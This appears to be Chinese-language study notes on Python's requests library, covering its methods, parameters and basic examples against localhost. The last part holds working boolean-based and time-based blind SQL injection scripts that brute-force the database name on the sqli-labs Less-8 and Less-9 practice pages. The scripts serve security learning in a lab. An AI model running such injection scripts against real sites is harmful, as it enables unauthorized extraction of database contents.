py发送http请求
import requests
requests模块模块中的http方法
r=requests.get()
r=requests.post()
r=requests.put()
r=requests.delete()
r=requests.head()
r=requests.options()
参数:
GET参数 params
HTTP头部 headers
POST参数 datas
文件 files
Cookies cookies
重定向处理 allow_redirects=False/True
超时 timeout
证书验证 verify=False/True
工作流 stream=False/True
事件挂钩 hooks=dict(response=)
身份验证 auth=
代理 proxies=
对象方法:
URL .url
text .text
编码 .encoding | .encoding=
相应内容 .content
Json解码器 .json
原始套接字响应 .raw | .raw.read() (需要开启stream=True)
历史响应代码 .history
抛出异常 .raise_for_status()
查看服务器响应头 .headers
查看客户端响应头 .request.headers
查看cookie .cookies
身份验证 .auth=
更新 .update
解析连接字头 .links()
用python发送request请求
import requests
r = requests.get('http://localhost/pytest/get.php') #get方法发送请求,结果保存在r中
print(r.text) #查看正文内容
print(r.status_code) #查看响应状态码
print(r.encoding) #查看编码
print(r.headers) #查看响应头
定制头部
import requests
url = "http://localhost/pytest/get.php"
header = {"User-Agent":"dgut"}
r = requests.get(url=url,headers=header)
print(r.request.headers)
定义超时时间
import requests
url="http://localhost/pytest/timeout.php"
try:
r=requests.get(url=url,timeout=3) #超过3s没有回应就当作超时
print(r.text)
except Exception as e:
print("timeout")
给get方法传参
import requests
url = "http://localhost/pytest/get.php"
params = {"name": "test","pwd": "test"}
r = requests.get(url=url,params=params)
print(r.text)
给post方法传参
import requests
url = "http://localhost/pytest/post.php"
data = {"username": "test1","pwd": "empty"}
r = requests.post(url=url,data=data)
print(r.text)
上传文件
import requests
url = "http://localhost/pikachu/vul/unsafeupload/clientcheck.php"
upFile = {"uploadfile": open("title.png", "rb")} #uploadfile对应上传文件类的name
post = {"submit": "submit"} #对应提交按钮的type和name
r = requests.post(url=url, files=upFile, data=post)
print(r.text)
通过py进行布尔盲注爆数据库名(sqli的less8)
import requests
import string
url = "http://127.0.0.1/sqli/Less-8/"
webLen = len(requests.get(url=url+"?id=1").text) #正常的页面长度
print("Len of html is:"+str(webLen))
dbNameLen = 0
while 1:
tUrl = url+"?id=1'+and+length(database())="+str(dbNameLen)+"--+" #探测数据库长度
print(tUrl)
if len(requests.get(tUrl).text) == webLen: #当页面长度与正常页面长度相同时判断为正确的数据库长度
print(dbNameLen)
break
if dbNameLen > 30:
print("error")
break
dbNameLen += 1
dbName = ""
for i in range(1, dbNameLen+1):
for a in string.ascii_letters:
dbName_url = url + "?id=1'+and+substr(database(),"+str(i)+",1)='"+a+"'--+" #穷举数据库名字
print(dbName_url)
if len(requests.get(dbName_url).text) == webLen:
dbName += a
break
print(dbName)
基于时间的盲注(sqli less9)
import requests
import string
url = "http://127.0.0.1/sqli/Less-9/?id=1"
# 判断数据库名长度
a = 0
while 1:
dbLenUrl = url + "' and if(length(database())=" + str(a) + ",sleep(6),sleep(0))" + "--+"
try:
r = requests.get(url=dbLenUrl, timeout=2)
a += 1
except Exception as e:
print("len is " + str(a))
break
# 判断数据库名
dbName = ""
for i in range(1, a + 1):
for each in string.ascii_letters:
# if(substr(database(),i,1)='each',sleep(6),sleep(0))
dbNameUrl = url + "' and if(substr(database()," + str(i) + ",1)='" + each + "',sleep(6),sleep(0))" + "--+"
try:
res = requests.get(url=dbNameUrl, timeout=2)
continue
except Exception as e:
dbName = dbName + each
print(dbName)
break
print("databaseName is " + dbName)